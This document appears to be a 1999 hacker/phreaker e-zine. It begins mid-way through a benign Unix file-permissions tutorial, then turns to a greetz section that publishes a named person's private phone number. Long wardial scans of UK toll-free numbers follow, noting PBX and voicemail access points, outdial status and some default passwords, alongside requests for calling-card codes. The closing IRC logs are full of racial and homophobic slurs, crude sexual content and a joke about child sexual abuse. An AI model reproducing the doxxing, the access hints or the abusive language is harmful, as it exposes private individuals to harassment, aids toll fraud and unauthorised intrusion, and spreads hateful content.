permissions. Next it tells you how many links the file has. It then tells you
who owns the file (zomba) and what group is associated with the file (users).
Following the ownership section, the date and timestamp for the last time the
file was modefied is given. Finally, the name of the file is listed (0d4yz).
The permissions are actually made up of four sections. The first section is a
single character that identifies the type of object that is listed out, these
can be:
- Plain File
b Block special file
c Character special file
d Directory
l Symbolic link
p Named pipe
s Socket
Following the file type identifier are the three sets of permissions: rwx
(owner), r-- (group), r-- (other).
Directories
----oo-----
The permissions on a directory are the same as those used by files: read, write
and execute. The actual permissions, though, mean different things. For a
directory, read access provides the ability to list the names of the files in
that directory. It does not allow the othet attributes to be seen (owner,
group, size, and so on). Write access provides the ability to alter the
directory contents. This means that the user could create and delete files in
the directory. Finally, execute access lets the user make the directory the
current directory.
As I stated earlier, the permissions can also be manipulated with a numeric
coding system. The basic concept is the same as the letter coding system. As
a matter of fact, the permissions look exactly alike. The difference is that
way the permissions are identified. The numeric system uses binary counting
to determine the value for each permission and sets them. Also, the find
command can accept the permissions as an argument using the -perm option. In
this case, the permissions must be given in their numeric form.
With binary, you count from the right to the left. Therefore, if you look at
a file, you can easily come up with its numeric coding system value. The
following file has full permissions for the owner and read permissions for
the group and the world:
shell:/home/zomba$ ls -la 0clue
-rwxr--r-- 1 zomba users 10 May 22 00:12 0clue
This would be coded as 744, the table below shows how this was formed.
Permission Value
Read 4
Write 2
Execute 1
Permissions use an additive (if thats a word) process. Therefore, a person
with read, write, and execute permissions to a file would have 7 (4+2+1).
Read and execute would have a value of 5. Remember, there are three sets of
values, so each section would have its own value. The following table shows
both the numeric system and the character system for the permissions:
Permission Numeric Character
Read-only 4 r--
Write-only 2 -w-
Execute-only 1 --x
Read and write 6 rw-
Read and execute 5 r-x
Read, write and execute 7 rwx
Permissions can be changed using the chmod command. With the numeric system,
the chmod command must be given the value of all three fields. Therefore, to
change a file to read, write, and execute by everyone, the following command
would be issued:
$ chmod 777 <filename>
To perform the same task with the character system, the following command
would be issued:
$ chmod a+rwx <filename>
Of course, more than one type of permission can be specified at any one time. The
following command adds write access for the owner of the file, and adds read
and execute access to the group and everyone else:
$ chmod u+w,og+rx <filename>
The advantage that the character system provides is that you do not have to
know what the previous permissions are. You can selectively add or remove
permissions without worrying about the rest. With the numeric system, each
section of users must always be specified. The downside of the character
system is when complex changes are being made. Looking at the preceding
example (chmod u+w,og+rx <filename>), it might have been easier to use the
numeric system and replace all those letters with three numbers: 755.
How suid and sgid fit into this picture
--oOo----------------------------------
The special purpose access modes suid and sgid add an extra character to the
picture. Before looking at what a file looks like with the different special
access modes, take a look at the table below for the identifying characters
for each of the modes.
Code Name Meaning
s suid Sets process user ID on execution
s sgid Sets process group ID on execution
suid and sgid are used on executables. Therefore, the code is placed where
the code for the executable would normally go. The following file has suid
set:
$ ls -la w0rd
-rwsr--r-- 1 zomba users 10 May 22 00:22 w0rd
The difference between the suid being set and the sgid being set is the
placement of the code. The same file with sgid active would look like this:
$ ls -la w0rd
-rwxr-sr-- 1 zomba users 10 May 22 00:22 w0rd
To set the suid with the character system, the following command would be
executed:
$ chmod u+s <filename>
To set the sgid with the character system, the following command would be
executed:
$ chmod g+s <filename>
To set the suid and the sgid using the numeric system, you will have to use
these two commands:
$ chmod 2### <filename>
$ chmod 4### <filename>
In both instances, the ### is replaced with the rest of the values for the
permiss-ions. The additive process is used to combine permissions; therefore,
the following command would add suid and sgid to a file:
$ chmod 6### <filename>
The default mode for a file or directory
--oOo-----------------------------------
The default mode for a file or directory is set with the umask. The umask
uses the numeric system to define its value. To set the umask, you must first
determine the value that you want the files to have. For example, a common
file permission set is 644. The owner has read and write permissions and the
rest of the world has read permission. After the value is determined, then it
is subtracted from 777. Keeping the same example of 644, the value would then
become 133. This value is the umask value. Typically, this value is placed in
a system file that is read when a user first logs on. After the value is set,
all files created will set their permissions automatically using this value.
Passwords: a second look
--oOo-------------------
The system stores the user's encrypted password in the /etc/passwd file. If
the system is using a shadow password system, the value placed in this field
will be an x. A value of * blocks login access to the account, as * is not a
valid character for and encrypted field. This field should never be edited
(after it is set up) by hand, but a program such as passwd should be used so
that proper encrytpion takes place. If thgis field is changed by hand, the
old password is no longer valid and, more than likely, will have to be
changed by root.
NOTE: if the system is using a shadow password system thena seperate file
exists called /etc/shadow that contains passwords (encrypted).
A password is a secret set of characters set up by the user that is known
only by the user. The system asks for the password, compares what is input to
the known password, and, if they match, conforms that the user is who they
say they are and lets them access the system. I can't stress enough - do not
write down your password! it might be hard for a remote hax0r to see it but
anyone at your comp will immediatley gain your permissions.
Related WWW sites
--oOo------------
www.l0pht.com
www.rhino9.com
www.cert.org
www.geek-girl.com/bugtraq
members.xoom.com/phuk <-- soon all tewls mentioned in this file will be here!
www.rootshell.com
www.epidemik.org <-- not up yet but be sure to look out for it!
Basically, go to any site that offers exploits/security advisories and read
them, if any are relevant to your system, make sure you install any patches
available.
Greets and shouts
--oOo------------
Werd to the darkcyde collective, extra shouts to hybrid, bodie and force. Also
greetz to [JaSuN], darkflame, xio, PUBLiC NUiSANCE, shadow, gossi, elf,
downtime, kryptus, and a BIG shout to Oliver Tate....i mean erm...CFiSH..where the
hell did I put his number?...ahh here it is: (+44) 0181 9798895..oops, d1d I s4y
th4t 0uT l0UD?...heh (c) b4b0 1999.
-----------oOo------------ EOF ------------oOo-----------
********************************
*** zomba's bonus ph0newarez ***
********************************
895xxx Hand Scan April/May '99 by z0mba (000-310)
0800-895-004 Please Enter Pin
0800-895-006 CARRIER
0800-895-007 ?
0800-895-008 Network Associates Technical Support - www.nai.com
0800-895-011 CARRIER
0800-895-012 CARRIER
0800-895-013 Live - "OCI, this is Ron"
0800-895-014 Some shitty voice attendant - hit 0, eXt, # to xfer.
0800-895-015 Not in service.
0800-895-016 LOL
0800-895-017 Beep then live.
0800-895-020 Tightman (or summit)
0800-895-024 CARRIER
0800-895-026 beeeeep, then live
0800-895-030 CARRIER
0800-895-031 beep, beep, live (german)
0800-895-033 VMB (press #)
0800-895-035 Syflex network (?)
0800-895-036 busy
0800-895-037 beep, beep, live (german bastid!)
0800-895-038 ditt0
0800-895-039 CARRIER
0800-895-043 CARRIER
0800-895-044 German
0800-895-045 no answer
0800-895-049 Spacelabs Medical Employees line!
0800-895-050 Foreign (german?)
0800-895-051 FAX
0800-895-054 no answer
0800-895-056 PBX VMS, hit *, dial pwd, dial mailbox (strange!)
0800-895-059 VISA assistants centre
0800-895-060 loud beep, foreign, c5?
0800-895-061 AUDIX Direct, try 8xxx area
0800-895-062 8oo number cannot be reached from your calling area
0800-895-065 spanish line - time-share
0800-895-067 American Express Platinum Card service - rich cunts
0800-895-071 Please enter your PIN
0800-895-072 PBX VMS, loud clicks, press #
0800-895-076 PBX
0800-895-078 VISA Global Refund Service
0800-895-079 busy
0800-895-080 CARRIER
0800-895-081 no answer
0800-895-082 VISA International Service Centre
0800-895-084 Live
0800-895-086 PBX VMS Message Centre
0800-895-087 Live
0800-895-088 no answer
0800-895-090 PBX
0800-895-093 CARRIER
0800-895-095 VISA Global Refund Service
0800-895-099 CARRIER
0800-895-101 Please Enter Your PIN
0800-895-102 Live
0800-895-103 Live
0800-895-105 PBX - may be vms in here
0800-895-107 PBX
0800-895-108 busy
0800-895-110 PBX - press 2 for conference sales or to book a meeting!
0800-895-111 busy
0800-895-113 t0ne
0800-895-114 invalid service number
0800-895-116 no answer
0800-895-117 The number you have dialed is no longer running a promotion (?)
0800-895-118 Intec International VMB
0800-895-119 CARRIER
0800-895-120 Live
0800-895-121 The number you have dialed, 267-3551, has been changed
0800-895-122 CARRIER
0800-895-126 foreign
0800-895-128 B & B agency of Bosten
0800-895-129 Live
0800-895-130 Its a beautiful day in the villages, where may I direct your call?
0800-895-131 VMB Messagecentre
0800-895-133 CARRIER/FAX
0800-895-134 AUDIX Directo - try 5xxx, 8xxx areas
0800-895-137 Please enter your speed dial #... - cockney voice
0800-895-142 ring ring, ring ring, ring ring
0800-895-144 Live
0800-895-146 Invalid service number
0800-895-151 PBX
0800-895-152 no answer
0800-895-155 CARRIER
0800-895-156 Conference Centre
0800-895-159 Cybex International PBX
0800-895-160 no answer
0800-895-163 Live
0800-895-164 CARRIER
0800-895-165 PBX MM Switch - outdial disabled
0800-895-169 Voicemail Gateway - try 5009#, LOL!
0800-895-172 weird
0800-895-177 Live - Customer Services
0800-895-179 CARRIER on a c5 line
0800-895-181 strange
0800-895-182 Invalid service number
0800-895-183 PBX
0800-895-185 AUDIX eXt 45895 is not available
0800-895-187 answerfone www.executiveresorts.com
0800-895-188 Fax/Carrier
0800-895-191 Busy
0800-895-192 CARRIER
0800-895-193 Live
0800-895-194 CARRIER
0800-895-195 CARRIER
0800-895-198 "Hello Jennifer speaking..."
0800-895-199 Crappy PBX
0800-895-200 PBX
0800-895-201 Live
0800-895-203 # not in service
0800-895-204 just beeps
0800-895-207 KDD
0800-895-208 CARRIER
0800-895-211 KDD
0800-895-212 # disconnected
0800-895-216 Busy
0800-895-217 no answer
0800-895-218 KDD
0800-895-219 Please dial your personal ID number...
0800-895-220 Please enter your PIN
0800-895-221 Live
0800-895-222 weird beeps
0800-895-225 Please dial your personal ID number...
0800-895-226 KDD international telephone office in Japan
0800-895-227 Foreign
0800-895-228 Live
0800-895-229 no answer
0800-895-231 Please dial your personal ID number...
0800-895-232 KDD
0800-895-234 Please dial your personal ID number...
0800-895-235 KDD
0800-895-236 Please enter your card number and PIN now
0800-895-238 no answer
0800-895-240 Weird
0800-895-243 French
0800-895-244 Welcome to Access International, enter authorisation code now.
0800-895-245 KDD
0800-895-246 CARRIER
0800-895-247 Please dial your personal ID number...
0800-895-249 Please dial your personal ID number...
0800-895-250 not available from your calling area.
0800-895-251 KDD
0800-895-252 KDD
0800-895-253 no answer
0800-895-255 Christian somethin'
0800-895-256 PBX - french and english
0800-895-258 KDD
0800-895-259 no longer in service
0800-895-260 Please dial your personal ID number...
0800-895-261 KDD
0800-895-262 KDD
0800-895-263 Live
0800-895-264 ID
0800-895-265 Live
0800-895-266 ID
0800-895-267 KDD
0800-895-268 Live
0800-895-269 KDD
0800-895-271 KDD
0800-895-272 Live
0800-895-274 KDD
0800-895-276 CARRIER
0800-895-277 no answer
0800-895-278 no answer
0800-895-279 CARRIER
0800-895-280 no answer
0800-895-281 CARRIER
0800-895-284 KDD
0800-895-285 KDD
0800-895-286 no answer
0800-895-287 Live
0800-895-288 no answer
0800-895-289 KDD
0800-895-291 no answer
0800-895-292 no answer (does no-one answer the fuckin' fone anymore?)
0800-895-293 C00l, "account # and press pound", "password and press pound"
0800-895-294 KDD
0800-895-299 Commerce Bank - Live
0800-895-301 CARRIER
0800-895-302 "What Service?"
0800-895-303 CARRIER
0800-895-306 KDD
0800-895-307 CARRIER
0800-895-310 KDD
-->[OO]::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
-->]OO[::[ Scan of O8OO 252 XXX ]::::::::[OO--[ by shadow-x ]----------------
-->]OO[::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
0800252001 - bloke answered
0800252003 - fax
0800252016 - communications house answer machine
0800252020 - disaster recovery system
0800252021 - Carrier 3 login attempts
0800252022 - no answer
0800252023 - fax
0800252024 - no answer
0800252026 - no answer
0800252031 - no answer
0800252032 - live
0800252037 - answer machine
0800252038 - web bay distributers *pbx* (voice connector)
0800252039 - bitch answered
0800252040 - busy
0800252041 - live
0800252044 - guiness customer services *VMB* (infostar 24 hour)
0800252048 - bloke answered
0800252049 - no answer
0800252050 - answer machine
0800252050 - answer machine
0800252055 - no answer
0800252056 - no answer
0800252057 - fax
0800252058 - no answer
0800252059 - kelly services (answer machine 2 digit password)
0800252060 - hospital outpatients answer machine
0800252061 - no answer
0800252070 - bt answering service
0800252071 - live
0800252074 - medics assistance
0800252077 - bloke answered
0800252078 - AT&T comms
0800252079 - bloke answered
0800252080 - stationary office norwige answer machine
0800252081 - answer machine (password 12)
0800252083 - live
0800252086 - answer machine 2 digit
0800252087 - dating agency
0800252088 - hmm something automated hotline
0800252089 - live
0800252094 - no answer
0800252095 - answer machine
0800252097 - bloke answered
0800252098 - no answer
0800252099 - direct services bloke answered
0800252100 - live
0800252102 - answer machine
0800252103 - answer machine
0800252104 - answer machine
0800252105 - answer machine
0800252118 - no answer
0800252121 - (infostar vmb)
0800252125 - no answer
0800252127 - bt answer service
0800252130 - answer machine
0800252134 - no answer
0800252135 - fax service
0800252141 - sutherlands live
0800252147 - live
0800252150 - fairway legistics VMB
0800252153 - Carrier Bad case of security by obscurity (try it!)
0800252154 - fax
0800252157 - no answer
0800252158 - live
0800252160 - engaged
0800252166 - live
0800252167 - no answer
0800252168 - pbx (5402 def) old meridian
0800252170 - pbx
0800252171 - answer machine
0800252172 - live
0800252175 - live
0800252177 - live
0800252179 - answer machine 2 digit
0800252180 - live
0800252181 - answer machine
0800252183 - london uni answer machine
0800252184 - live
0800252185 - no answer
0800252188 - live
0800252192 - live
0800252193 - call diverted to answer machine
0800252195 - answer machine
0800252198 - PBX and VMB meridian
0800252200 - live
0800252201 - Carrier (Noted)
0800252210 - engaged
0800252211 - answer machine 2 digit password
0800252213 - call que
0800252215 - no answer
0800252216 - no answer
0800252217 - no answer
0800252219 - no answer
0800252220 - answer machine
0800252223 - cannon uk (answer machine)?
0800252225 - no answer
0800252226 - no answer
0800252227 - barclays pbx
0800252228 - live
0800252230 - no answer
0800252231 - barclay pbx
0800252233 - no answer
0800252235 - answer machine
0800252237 - no answer
0800252239 - live
0800252241 - no answer
0800252243 - live
0800252244 - live asks for card number
0800252247 - no answer
0800252248 - VMB
0800252250 - dead
0800252254 - college answer machine
0800252255 - VMB (infostar)
0800252257 - engaged
0800252258 - Carrier Just sits there
0800252260 - no answer
0800252261 - no answer
0800252262 - answer machine
0800252263 - no answer
0800252264 - no answer
0800252265 - no answer
0800252266 - answer machine
0800252268 - BT payphones (answer machine)?
0800252269 - PBX and VMB (infostar)
0800252270 - line busy
0800252272 - answer machine
0800252276 - barclay pbx
0800252280 - live
0800252281 - windows PBX
0800252282 - no answer
0800252283 - no answer
0800252286 - PBX
0800252289 - no answer
0800252291 - bloke
0800252292 - no answer
0800252295 - answer machine
0800252300 - live
0800252303 - no answer
0800252304 - ????? could be a pbx
0800252305 - starstruck again!
0800252307 - call queing
0800252308 - barclays
0800252312 - carrier? could be a fax
0800252317 - engaged
0800252318 - answer machine
0800252322 - engaged
0800252324 - VMB
0800252325 - no answer
0800252331 - no answer
0800252332 - no answer
0800252333 - barclays
0800252338 - no answer
0800252340 - no answer
0800252341 - no answer
0800252342 - vodaphone recall service
0800252345 - live
0800252346 - no answer
0800252348 - no answer
0800252349 - no answer
0800252351 - carrier? fucked
0800252352 - answer machine 2 digit
0800252355 - live
0800252356 - Carrier buggy
0800252357 - VMB?
0800252358 - live
0800252359 - no answer
0800252361 - live
0800252362 - live
0800252363 - Carrier disconnected now
0800252364 - answer machine
0800252365 - no answer
0800252367 - starstruck advertisment
0800252369 - answer machine
0800252374 - bt buisness training meridian 7753 no outdial
0800252380 - answer machine
0800252384 - no answer
0800252397 - answer machine
0800252399 - carrier?
0800252400 - answer machine
0800252401 - answer machine
0800252402 - no answer
0800252403 - no answer
0800252404 - answer machine
0800252405 - live
0800252406 - no answer
0800252407 - no answer
0800252408 - no answer
0800252409 - answer machine
0800252410 - VMB
0800252414 - no answer
0800252415 - answer machine
0800252416 - no answer
0800252417 - no answer
0800252418 - answer machine
0800252420 - answer machine 2 digit
0800252423 - no answer
0800252425 - VMB message center
0800252427 - no answer
0800252429 - fax?
0800252430 - no answer
0800252433 - barclays
0800252434 - no answer
0800252436 - answer machine 2 digit
0800252438 - no answer
0800252439 - live
0800252441 - no answer
0800252445 - live
0800252446 - barclay card
0800252447 - answer machine
0800252449 - no answer
0800252453 - no answer
0800252454 - fax?
0800252455 - no answer
0800252460 - no answer
0800252461 - answer machine
0800252465 - answer machine
0800252467 - live
0800252470 - extender?
0800252471 - no answer
0800252472 - live
0800252473 - no answer
0800252474 - fax?
0800252475 - answer machine
0800252477 - answer machine
0800252479 - answer machine
0800252482 - no answer
0800252485 - dating agency
0800252488 - live
0800252489 - live
0800252490 - carrier disconnected now
0800252495 - live
0800252500 - live
0800252502 - live
0800252507 - no answer
0800252511 - MERIDIAN
0800252513 - live
0800252517 - no answer
0800252518 - no answer
0800252520 - answer machine?
0800252521 - live
0800252522 - answer machine
0800252525 - engaged
0800252527 - no answer
0800252530 - answer machine
0800252531 - no answer
0800252534 - live
0800252536 - no answer
0800252538 - no answer
0800252541 - BT payphone sales
0800252544 - no answer
0800252547 - no answer
0800252548 - answer machine?
0800252549 - MERIDIAN
0800252550 - no answer
0800252552 - VMB?
0800252554 - live
0800252555 - VMB
0800252556 - no answer
0800252560 - no answer
0800252561 - PBX
0800252563 - fax
0800252567 - no answer
0800252569 - live
0800252571 - VMB
0800252573 - live
0800252579 - live
0800252584 - bt payment message line
0800252585 - no answer
0800252587 - answer machine
0800252588 - bt phoncard sales MERIDIAN
0800252592 - PBX
0800252593 - no answer
0800252594 - live
0800252596 - live
0800252597 - no answer
0800252599 - live
0800252600 - no answer
0800252601 - answer machine
0800252603 - no answer
0800252604 - no answer
0800252605 - no answer
0800252606 - fax
0800252607 - no answer
0800252608 - live
0800252609 - answer machine 2 digit password
0800252611 - no answer
0800252612 - carrier net internet, disconnects after 1 failed login
0800252613 - no answer
0800252614 - no answer
0800252615 - answer machine 2 digit
0800252617 - no answer
0800252619 - no answer
0800252623 - answer machine 3 digit
0800252624 - answer machine
0800252625 - no answer
0800252627 - no answer
0800252628 - MERIDIAN
0800252632 - no answer
0800252639 - bt payphones
0800252640 - vmb?
0800252641 - no answer
0800252642 - no answer
0800252643 - live
0800252646 - no answer
0800252649 - no answer
0800252651 - live
0800252653 - live
0800252654 - engaged
0800252658 - no answer
0800252663 - live
0800252667 - pbx
0800252668 - no answer
0800252672 - no answer
0800252674 - answer machine
0800252675 - no answer
0800252676 - live
0800252677 - live
0800252679 - no answer
0800252683 - no answer
0800252687 - answer machine
0800252688 - no answer
0800252691 - live
0800252692 - no answer
0800252695 - no answer
0800252696 - no answer
0800252697 - engaged
0800252707 - bt service managment center
0800252710 - live
0800252712 - live (some slag)
0800252713 - answer machine
0800252714 - live
0800252716 - answer machine
0800252717 - live
0800252718 - live
0800252723 - answer machine
0800252725 - engaged
0800252726 - live
0800252734 - message paging
0800252735 - live
0800252736 - VMB
0800252739 - live
0800252742 - live
0800252745 - answer machine (2 digit)
0800252746 - carrier buggy
0800252747 - argos direct
0800252750 - live
0800252751 - live ism
0800252753 - live
0800252756 - live
0800252760 - live
0800252761 - Carrier screwed
0800252762 - Carrier dodgy
0800252763 - Carrier dodgy
0800252764 - Carrier dodgy
0800252765 - answer machine
0800252769 - live
0800252772 - answer machine (password 12)
0800252773 - live
0800252775 - answer machine
0800252777 - live
0800252780 - live
0800252781 - bt customer service center
0800252783 - live
0800252784 - bt center
0800252785 - bt service managment center
0800252786 - answer machine
0800252787 - answer machine
0800252788 - live
0800252789 - answer machine
0800252793 - live
0800252795 - live
0800252796 - live
0800252801 - fax
0800252802 - fax
0800252806 - wierd hangs up after click?
0800252809 - T Mark, bloke answered
0800252816 - no answer
0800252818 - answer machine 4 digit password
0800252819 - no answer
0800252829 - no answer
0800252833 - answer machine
0800252834 - talking tesco answer machine
0800252835 - fax?
0800252836 - no answer
0800252838 - no answer
0800252839 - VMB meridian no outdial
0800252840 - hotel reservations answer machine
0800252841 - no answer
0800252842 - no answer
0800252847 - bloke answered (was not very happy with carrier tone)
0800252850 - fault
0800252851 - bitch answered
0800252853 - answer machine
0800252854 - hotel reservations answer machine
0800252855 - no answer
0800252858 - PBX
0800252859 - answer machine
0800252867 - cannot connect
0800252870 - ardvark appliances answer machine 4 digit (mail box locked) could be a VMB
0800252876 - answer machine
0800252880 - Carrier (just sits there)
0800252881 - bitch answered
0800252882 - ross helpline answer machine (could be PBX)
0800252883 - no answer
0800252884 - no answer
0800252889 - "if you are sending a fax please press the send key"
0800252890 - bitch answered
0800252892 - no answer
0800252897 - rent a car usa PBX
0800252902 - woman answered
0800252903 - Powertech information service vmb
0800252904 - no answer
0800252907 - answer machine 2 digit password
0800252908 - Carrier (Noted) netcom
0800252909 - carrier (scrolls garbage)
0800252911 - no answer
0800252912 - no answer
0800252914 - underground caverns? (*7214)
0800252917 - woman answered
0800252918 - Botanic helpline
0800252919 - opperator is engaged
0800252920 - woman answered
0800252925 - the number has changed
0800252931 - no answer
0800252935 - no answer
0800252937 - dial and message vmb?
0800252939 - no answer
0800252941 - no answer
0800252943 - wierd pippy noise (?)
0800252944 - buisness office possible vmb
0800252945 - answer machine
0800252947 - no answer
0800252948 - no answer
0800252953 - bitch
0800252958 - answer machine
0800252960 - calls are being diverted...
0800252962 - no answer
0800252963 - carrier disconnected
0800252964 - bloke answered
0800252968 - no answer
0800252972 - answer machine
0800252973 - bitch
0800252974 - bloke
0800252977 - bitch
0800252978 - no answer
0800252980 - answer machine 2 digit password
0800252986 - no answer
0800252989 - something direct (answer machine)
0800252990 - answer machine (hackable)
0800252991 - no answer
0800252992 - bitch, something hotel
0800252995 - all opperators are engaged...
0800252996 - answer machine
0800252997 - voice connector vmb
0800252999 - bloke answered
-->[OO]::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
-->]OO[::[ IRC logz ]::::::::[OO--[ by various peeps ]-----------------------
-->]OO[::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
fORCE's quotes of the month - READ THIS SHIT, LOL@!@!"$@!"$!
--oOo----------------------
Now force comes out with some funny shit on IRC, and here is the best of it,
now please remember that any references to him being gay (or me for that
matter) are just *jokes* and should not be taken seriously!, a lot was taken
from logs from when we were pranking various chans including #gay #gaysex and
#jesus.
[00:41] <fORCE-> feckin internet explorer sucks
[01:11] <fORCE-> kinda, i had a guy telling me he was putting nutella on his
dick
[01:12] <fORCE-> hehe
[01:12] <fORCE-> turned me on!
<z0mba> funniest thing i heard all day
[01:13] <fORCE-> :)
[01:13] <fORCE-> 100% true
[01:13] <fORCE-> sick people on those lines
<z0mba> i take it you hung up pretty sharpish
[01:14] <fORCE-> NO WAY! i ran to the kitchen and go the nutella!
[01:14] <fORCE-> got the
<z0mba> heh
[01:14] <fORCE-> to see what i was missing out on...
<z0mba> so you ended up with a brown knob
<z0mba> hmm
[01:15] <fORCE-> yeah had to shower afterwards :(
[01:39] <fORCE-> browsing pr0n whilst not paying...
<z0mba> life doesn't get any better
[01:39] <fORCE-> if i was getting head right now it would be perfect
<z0mba> you spanking your monkey?
[01:52] * fORCE- moans
<z0mba> that'll be a yes then
[01:53] <fORCE-> no
[01:53] <fORCE-> i *was* but i was premature
[01:53] <fORCE-> :(
<z0mba> sticky keyboard
<z0mba> feck
[01:55] <fORCE-> pheck
[01:06] <fORCE-> ok, what music you into
[01:06] <fORCE-> ?
[01:06] <fORCE->
[01:06] <fORCE-> The Abyssinian Baptist Gospel Choir
[01:06] <fORCE-> ?
<z0mba> oh yeah man, they r0ck
[01:07] <fORCE-> lol
[01:07] <fORCE-> fuckin negros
[01:09] <fORCE-> well i gotta go, you greasy slut
[23:28] <fORCE-> cfish is leet i wish i was as cool as him
<z0mba> ladyboy
[23:33] <fORCE-> word
[23:34] <fORCE-> bangkok chickboy
<z0mba> pegleg motherfuckin' cocksucking wh0re
[23:34] <fORCE-> you know liz hurley?
<z0mba> yeah man, fucked her last week
[23:36] <fORCE-> leet
[23:36] <fORCE-> she comes from where i live
[23:41] <fORCE-> g33k
<z0mba> fux0r you
[23:41] <fORCE-> fr34k
<z0mba> l4m3r
[23:42] <fORCE-> p3gl3g
<z0mba> l4dyb0y
[23:42] <fORCE-> b4ngk0k ch1ckb0y
[23:44] <fORCE-> now i'm really off
[23:44] <fORCE-> the net sucks
[23:44] <fORCE-> i'm never coming back
[23:44] <fORCE-> send me some voice mail nigger
[23:44] <fORCE-> and include c0dez in them
<z0mba> yeah right
[00:40] <fORCE-> oi
[00:40] <fORCE-> pencil dick
<z0mba> y0y0
<z0mba> l4m3w0d
[00:41] <fORCE-> p3nc1ld1c|<
[00:42] <fORCE-> what up
<z0mba> nothin
[00:43] <fORCE-> got any <0d3z?
[23:29] <fORCE-> why 2 of you?
<z0mba> the other is a shell
[23:30] <fORCE-> i see
[23:31] <fORCE-> said the blind man to his deaf dog
[01:04] <fORCE-> you are an experiance rider of the chocolate highway
[01:04] <fORCE-> i have a gimp suit
[01:04] <fORCE-> they are ereet
[01:38] <fORCE-> i love the advery
[01:39] <fORCE-> advert
[01:39] <fORCE-> ooooooooh eight niiiine ooooone FIFTY! FIFTY! FIFTY!
[01:39] <fORCE-> i called it once through a pbx
<z0mba> i know
<z0mba> nutella on dick incident
[01:40] <fORCE-> haha
[01:40] <fORCE-> did i tell ya about me hearing that cfish lamer on there?
<z0mba> no
[01:41] <fORCE-> i heard his voice before on vmbs and i knew his name and
this guy on 0891505050 says "its ollie i'm busting for it so please message
me girls"
[01:41] <fORCE-> i swear it was him
[01:41] <fORCE-> i messaged him but he went straight away
[22:14] <fORCE> hey
[22:14] <fORCE> i love a big veiny cock in my ass
[22:14] <fORCE> i like gangbangs...anyone else?
[22:14] <fORCE> i lost my anal virginity to my dog
[22:15] <fORCE> i got gang raped once by a gang of 1O year olds
* fORCE is now known as fatb0y
[02:27] <fatb0y> i stared at all the boys in the changing rooms and the
showers
[02:27] <fatb0y> i got an erection
[02:27] <fatb0y> and they called me 'boner boy' for the rest of my school
life
[02:28] <fatb0y> i feel so bad
[02:28] <fatb0y> considered suicide
[02:28] <fatb0y> didn't work
[02:28] <fatb0y> so i went to this gay bar
[02:28] <fatb0y> and met some really *nice* people
[02:28] <fatb0y> one was called 'ian'
[02:28] <fatb0y> he took me back to his place and we 'played around'
[02:29] <fatb0y> then he started getting rough
[02:29] <fatb0y> and pinned me down
[02:29] <fatb0y> and penetrated my anus hole
[02:29] <fatb0y> it felt so good
[02:29] <fatb0y> but it also hurt
[02:29] <fatb0y> i bled a fair bit
[02:29] <TweetyBd> do you like to get fucked?
[02:29] <fatb0y> i still get discharge
[02:29] <fatb0y> it was nice
[02:29] <fatb0y> and yes i do
[02:30] <fatb0y> i wish i had a vagina
[02:30] <fatb0y> so much
[02:30] <fatb0y> so do you guys bleed a lot?
[02:30] <fatb0y> or am i a freak?
[21:31] <fORCE> my mum rekons jesus was an alien
[21:32] <lambda> NM: it would be impossible for that to be done and for a
huge inverse parralelism to occur
[21:32] *** Quits: NM (Leaving)
[21:32] <fORCE> i read that jesus was a mafia boss once
[21:32] <lambda> hahhaha
[21:34] <fORCE> i read that jesus likes it hardc0re up his rear dorr
[21:34] <fORCE> door even
TONEKILLA } b1tch1ng
-----------------
(tonekill4): why have you been such a bitch to me recently?
([JaSuN]): eh?
([JaSuN]): i have not
([JaSuN]): if you mean about darkcyde - hybrid told me who to allow ops via
bot
(tonekill4): have too
(tonekill4): removing me from op
(tonekill4): and shit
([JaSuN]): look dude, its not upto me
(tonekill4): thats being a bitch
([JaSuN]): well...not my choice
(tonekill4): specially when everyone was turning on me
(tonekill4): haha
(tonekill4): hybrid says jump
([JaSuN]): besides, even if you have op on fatality...slut would deop you
(tonekill4): everyone follows the master god's command
(tonekill4): i fucking ran that hcnanel for 2 months
(tonekill4): kept you and your bot opped
(tonekill4): and then bewm&(*!^$#*&&$*&#
([JaSuN]): sorry...i don't have any say
(tonekill4): well...
(tonekill4): still...
([JaSuN]): i just put the fucking thing in there
([JaSuN]): sorry!
(tonekill4): i mean i fucking ran that channel with no problem
(tonekill4): then all the sudded
([JaSuN]): tell hybrid then
(tonekill4): everyone fucking jumps around hybrid like he's god and just
fucking turns on me
(tonekill4): i cant talk to him
(tonekill4): he has me on ignore
(tonekill4): so i cant work the shit out
(tonekill4): i halfway told him completly how to run a bot
(tonekill4): he asked me ? after ?
(tonekill4): and i helped him
(tonekill4): then all the sudded, he starts
([JaSuN]): owww.
(tonekill4): and when i ban him back, he kicks me out
(tonekill4): and takes me off op and shit
([JaSuN]): i see.
(tonekilla): but, since you are one of hybrid's adoring fans, forget it.
([JaSuN]): look
(tonekilla): and downtime is my fucking best friend
([JaSuN]): i don't support anyone or anything...
(tonekilla): and he does the same
([JaSuN]): i just was told who to give ops, thats all.
([JaSuN]): I don't stick up for anyone against other ppl I know and I don't
like arguments about it!
(tonekilla): ok
(tonekilla): ok
([JaSuN]): so..
([JaSuN]): i am still kewl with you, I have no problems.
(tonekilla): well ok
(tonekilla): i guess i remove ban then heh
(tonekilla): i thought it was your idea
(tonekilla): =>
([JaSuN]): about what?!
(tonekilla): come in
(tonekilla): #telkore
(tonekilla): oh
(tonekilla): and do you know the command on an old v. eggie to list all the
channels its in?
([JaSuN]): .status
([JaSuN]): that will tell you
(tonekilla): thanx
([JaSuN]): np
(tonekilla): yay
(tonekilla): heh
(tonekilla): i had forgotton a channel
---------------------
SPOT THE WORD _FUCK_ IN #darkcyde } we all need to learn some manners..
<oclet> tonekilla is a fuckin moron
<hybrid-> fucker
<hybrid-> i fucking keep my homewerk on there
<digiphrq> thats fucking lame... packet kiddies are coming at me for no real
reason tonight
<DTMFslut> force is a fuckin p4k13
<Kryptus> woops fucking script let me fix this
*xio* which fucking sucks, heh.
<simmeth> fuckin' shit
<holyblob> fuck
<[JaSuN]> fucking thing
<force> fuck sake
<prez_> my sounddev is fucked right now.. doesn't work .
<[JaSuN]> gimme fuckin greetz#
<prez_> i need a fucking linerec in.
<[JaSuN]> fuckin text flood y0
<[JaSuN]> fuck the song
<simmeth> err fuck
<prez_> god fucking damnit.
<prez_> i'm fucking pissed
<ch1ckie> fucking idiot
<ch1ckie> THE FUCKING MUD
* hybrid- wonders what the fuck is going on
